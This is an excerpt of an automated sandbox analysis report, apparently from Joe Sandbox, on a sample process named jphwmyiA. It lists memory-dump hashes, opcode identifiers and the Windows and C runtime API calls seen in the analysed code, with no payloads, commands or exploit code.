                                                                                                                                            • Instruction ID: 33195f0d063332124688080ff6a276048df59fe19477d0cd76716625f89c207c
                                                                                                                                            • Opcode Fuzzy Hash: 18dabe67bae4259e6ecd4a36e5b3ed17f484008d1cfb91abfd8d1a2f1652d027
                                                                                                                                            • Instruction Fuzzy Hash: A7D1B274E01228CFDB14DFA5D994B9DBBB2BF49300F1085A9D809AB368DB356E85CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5cd47dbd449806a70c08a8ebf38bf9a8209d86dfc7c5610d0381e95b318bf934
                                                                                                                                            • Instruction ID: 1fa228f2162e28f960e0093fbca0d03260cb79e1f6444e524f5eefa2f3a2b052
                                                                                                                                            • Opcode Fuzzy Hash: 5cd47dbd449806a70c08a8ebf38bf9a8209d86dfc7c5610d0381e95b318bf934
                                                                                                                                            • Instruction Fuzzy Hash: CAD1D374E00218CFDB54DFA5D984B9DBBB2BF89300F2084A9D808AB365DB75AD85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3491ed6aec669a278eb6ddc34610b089dea9c65ed14b7b4141cd6eb42841d9c5
                                                                                                                                            • Instruction ID: 6dc1fc9c5e6020897d9cb40f77b435f086313eb2f71bbc087f5dfa5efab4f9b7
                                                                                                                                            • Opcode Fuzzy Hash: 3491ed6aec669a278eb6ddc34610b089dea9c65ed14b7b4141cd6eb42841d9c5
                                                                                                                                            • Instruction Fuzzy Hash: 8AD1D174E00218CFDB54DFA5D994B9DBBB2BF89300F2084A9D808AB365DB35AD85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5c3b98ff85c388dfd02b0c9500e302519082dfbd46141f22199f1fc8e10df439
                                                                                                                                            • Instruction ID: 21862b0d30825417997bdb157c7ac2c6ceb2267502cf9edf3070fa4124c94cfb
                                                                                                                                            • Opcode Fuzzy Hash: 5c3b98ff85c388dfd02b0c9500e302519082dfbd46141f22199f1fc8e10df439
                                                                                                                                            • Instruction Fuzzy Hash: A3D1C174E01218CFDB54DFA5D984B9DBBB2BF89300F2084A9D808AB369DB356D85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e93f2f2456eae5ccc0c83d30e9a30cfc351e9e752fd915a28ff635051b3ea713
                                                                                                                                            • Instruction ID: 6cec6d664bbe49c42c4785f59685a9780a13386c637937e29791d4623394baf1
                                                                                                                                            • Opcode Fuzzy Hash: e93f2f2456eae5ccc0c83d30e9a30cfc351e9e752fd915a28ff635051b3ea713
                                                                                                                                            • Instruction Fuzzy Hash: F0D1E274E00218CFDB14DFA5D984B9DBBB2BF89300F2080A9D808AB365DB35AD85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 24dcc83810260cdcd43c73a2162ba0c6619d1c81bd62b0741545de6d80eb1021
                                                                                                                                            • Instruction ID: 587959816934aaab8e1c8ee737da3836c0ac78a54567d8b07f525a99007c6931
                                                                                                                                            • Opcode Fuzzy Hash: 24dcc83810260cdcd43c73a2162ba0c6619d1c81bd62b0741545de6d80eb1021
                                                                                                                                            • Instruction Fuzzy Hash: 21D1D174E00218CFDB54DFA5D994B9DBBB2BF89300F2084A9D808AB365DB35AD85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4b5db9e73cfe6ff9deb3eeff4290ea9a7f222912a698d4839c17a8cd2a63214c
                                                                                                                                            • Instruction ID: 5a74019ee71036c619954172ecf8f882d87960ca14275b6a429acc29141141bb
                                                                                                                                            • Opcode Fuzzy Hash: 4b5db9e73cfe6ff9deb3eeff4290ea9a7f222912a698d4839c17a8cd2a63214c
                                                                                                                                            • Instruction Fuzzy Hash: E8D1D374E01218CFDB54DFA5D984B9DBBB2BF89300F2084A9D808AB365DB35AD85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5e503f745c59971493f6295d4d447832de0c02f8c3175fb55bd8248300a1b4ed
                                                                                                                                            • Instruction ID: cde54a5c9aaec81bd696963089caac679bbb410c5a89435828d2a543dba06828
                                                                                                                                            • Opcode Fuzzy Hash: 5e503f745c59971493f6295d4d447832de0c02f8c3175fb55bd8248300a1b4ed
                                                                                                                                            • Instruction Fuzzy Hash: 2FD1D274E01218CFDB54DFA5D984B9DBBB2BF89300F2084A9D808AB365DB35AD85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c9c10419cd8c00ab5f95529a2608a96371a3e4c898d16c4c242c38ac0bb3272a
                                                                                                                                            • Instruction ID: 7b4b82be1e1d4dc179f01da3ad08a419331ba10758647d0465b35444730adc7a
                                                                                                                                            • Opcode Fuzzy Hash: c9c10419cd8c00ab5f95529a2608a96371a3e4c898d16c4c242c38ac0bb3272a
                                                                                                                                            • Instruction Fuzzy Hash: A3D1D374E01218CFDB54DFA5D984B9DBBB2BF89300F2080A9D808AB365DB756E85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3ac422393aba8bc5bf0e229d07da8f0ead9c22f9e50b1c788416dfd644e19beb
                                                                                                                                            • Instruction ID: 943932231fb4789ff75fdaacde8db44de0444e046617de3b376c7ca42cde798a
                                                                                                                                            • Opcode Fuzzy Hash: 3ac422393aba8bc5bf0e229d07da8f0ead9c22f9e50b1c788416dfd644e19beb
                                                                                                                                            • Instruction Fuzzy Hash: EDD1E474E01218CFDB14DFA5D994B9DBBB2BF89300F2080A9D808AB365DB35AD85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5f038a3162acae6677ce876995f342bbba35ce2bda1a1508e20b8f22476c97a1
                                                                                                                                            • Instruction ID: 5fb4a5c2e76db03fc3865ec7982e9e0e14b007ba39c061fffd98394ec1d1720c
                                                                                                                                            • Opcode Fuzzy Hash: 5f038a3162acae6677ce876995f342bbba35ce2bda1a1508e20b8f22476c97a1
                                                                                                                                            • Instruction Fuzzy Hash: 21D1E474E01218CFDB14DFA5D994B9DBBB2BF89300F2084A9D808AB369DB356D85CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d1e37a667ab9b80fd1eab8e88485217c6535c714733688024aa9c18e97a989d3
                                                                                                                                            • Instruction ID: 59bac116eeeb2baf30c486e49496aa77776cbf4022fedc98777c479d76a2b88b
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: da6ce29a3a3b5d9722d56a3d823009177266e25e29bca25019175d49e3054e91
                                                                                                                                            • Instruction ID: 5b60a09c2f3ff57aad6d35664d4e8f3af9942870bf1ff1b3b42912d5828bb081
                                                                                                                                            • Opcode Fuzzy Hash: da6ce29a3a3b5d9722d56a3d823009177266e25e29bca25019175d49e3054e91
                                                                                                                                            • Instruction Fuzzy Hash: 5BC1D574E00218DFDB14DFA5D945B9DBBB2BF89304F1080A9D809AB365DB35AE85CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 263516b40a7b7d1efbe42b5df19f6f8d7fe9729c977e197f98b4f3b4af82701d
                                                                                                                                            • Instruction ID: 3b3818a16fc3a603969f207c1178cb45a23c85f156bf537917fd23a7bed1d543
                                                                                                                                            • Opcode Fuzzy Hash: 263516b40a7b7d1efbe42b5df19f6f8d7fe9729c977e197f98b4f3b4af82701d
                                                                                                                                            • Instruction Fuzzy Hash: 39C1C474E00218DFDB14DFA5D995B9DBBB2BF89300F2080A9D809AB365DB395E85CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 985b3cd8be75397eb0fe6924b08a01345b11acefd15ba0d06a6cff605b7f9efe
                                                                                                                                            • Instruction ID: 5e2f19ef759f2848fbfc4f18ae75459b94d005bb68b060401dc9de5f368a8023
                                                                                                                                            • Opcode Fuzzy Hash: 985b3cd8be75397eb0fe6924b08a01345b11acefd15ba0d06a6cff605b7f9efe
                                                                                                                                            • Instruction Fuzzy Hash: 89C1D474E00218DFDB14DFA5D994B9DBBB2BF89300F2084A9D809AB365DB355E85CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 95fe03ce9715988cd86eb6874c3a8cee8e83eaabfcaf49b20a6a706f654e09ee
                                                                                                                                            • Instruction ID: 99dbaedc99a92959e292781852530413a4b632a16ea77068b7f45690e04da323
                                                                                                                                            • Opcode Fuzzy Hash: 95fe03ce9715988cd86eb6874c3a8cee8e83eaabfcaf49b20a6a706f654e09ee
                                                                                                                                            • Instruction Fuzzy Hash: 6AC1B474E00218DFDB14DFA5D955B9DBBB2BF89300F2080A9D809AB365DB399E85CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6cbe2f4110cc2498fdec3eaf292a3371db90e15b1d3487cb6fb52bac74b764d7
                                                                                                                                            • Instruction ID: fbc673c5fc878ec04af7286a70408b5f976582ac7c6b18d46eb5a355a9b55740
                                                                                                                                            • Opcode Fuzzy Hash: 6cbe2f4110cc2498fdec3eaf292a3371db90e15b1d3487cb6fb52bac74b764d7
                                                                                                                                            • Instruction Fuzzy Hash: 03C1D474E00218DFDB14DFA5D994B9DBBB2BF89300F2084A9D809AB365DB356E85CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 39eb23d1986a5334849114e88dbbeb14ea28933e4464b331c612c0938e39512d
                                                                                                                                            • Instruction ID: ab90a95d474fdb84732225f3dfd1a1745da8a73577fd108e5667bf93b209b5cd
                                                                                                                                            • Opcode Fuzzy Hash: 39eb23d1986a5334849114e88dbbeb14ea28933e4464b331c612c0938e39512d
                                                                                                                                            • Instruction Fuzzy Hash: 33C1A474E00218CFDB14DFA5D994B9DBBB2BF89300F2085A9D809AB365DB356E85CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a519d486dd87a37fbaaf7cc5be298ed3cda0fc0dc47c45ad219ced2bf1f6f8b0
                                                                                                                                            • Instruction ID: 43543976297dbaa54f60736a37969e460ca075e23a526848ffa0ff98bab6d960
                                                                                                                                            • Opcode Fuzzy Hash: a519d486dd87a37fbaaf7cc5be298ed3cda0fc0dc47c45ad219ced2bf1f6f8b0
                                                                                                                                            • Instruction Fuzzy Hash: 17C1C474E00218CFDB14DFA5D954B9DBBB2BF89300F2080A9D809AB365DB359E85CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 23960aedebcfea0cd27389fdecfb11c585e5cdf36af707297657e363109c5572
                                                                                                                                            • Instruction ID: 9e7c8ea0458fc680a431173ebcb1e72e1568a7a0f71539806b0295aad481cc9f
                                                                                                                                            • Opcode Fuzzy Hash: 23960aedebcfea0cd27389fdecfb11c585e5cdf36af707297657e363109c5572
                                                                                                                                            • Instruction Fuzzy Hash: 77C1B474E00218CFDB14DFA5D994B9DBBB2BF89304F2084A9D809AB365DB355E85CF50
                                                                                                                                            APIs
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,20E718E0), ref: 004170C5
                                                                                                                                            • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                            • _malloc.LIBCMT ref: 0041718A
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                            • _malloc.LIBCMT ref: 0041724C
                                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                            • __freea.LIBCMT ref: 004172A4
                                                                                                                                            • __freea.LIBCMT ref: 004172AD
                                                                                                                                            • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                            • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                            • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                            • _malloc.LIBCMT ref: 00417362
                                                                                                                                            • _memset.LIBCMT ref: 00417384
                                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                            • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                            • __freea.LIBCMT ref: 004173CF
                                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3809854901-0
                                                                                                                                            • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                            • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                            • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                            • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 004057DE
                                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                            • _malloc.LIBCMT ref: 00405842
                                                                                                                                            • _malloc.LIBCMT ref: 00405906
                                                                                                                                            • _malloc.LIBCMT ref: 00405930
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                                                            • String ID: 1.2.3
                                                                                                                                            • API String ID: 680241177-2310465506
                                                                                                                                            • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                            • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                            • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                            • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3886058894-0
                                                                                                                                            APIs
                                                                                                                                            • EntryPoint.JPHWMYIA(80070057), ref: 004017EE
                                                                                                                                              • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                                                              • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                            • EntryPoint.JPHWMYIA(80070057), ref: 00401800
                                                                                                                                            • EntryPoint.JPHWMYIA(80070057), ref: 00401813
                                                                                                                                            • __recalloc.LIBCMT ref: 00401828
                                                                                                                                            • EntryPoint.JPHWMYIA(8007000E), ref: 00401839
                                                                                                                                            • EntryPoint.JPHWMYIA(8007000E), ref: 00401853
                                                                                                                                            • _calloc.LIBCMT ref: 00401861
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1721462702-0
                                                                                                                                            APIs
                                                                                                                                            • __getptd.LIBCMT ref: 00414744
                                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                            • __getptd.LIBCMT ref: 0041475B
                                                                                                                                            • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                            • __lock.LIBCMT ref: 00414779
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                            • String ID: @.B
                                                                                                                                            • API String ID: 3521780317-470711618
                                                                                                                                            APIs
                                                                                                                                            • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                            • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2805327698-0
                                                                                                                                            APIs
                                                                                                                                            • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                            • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                            • __lock.LIBCMT ref: 00414008
                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                            • InterlockedIncrement.KERNEL32(20E71680), ref: 00414050
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
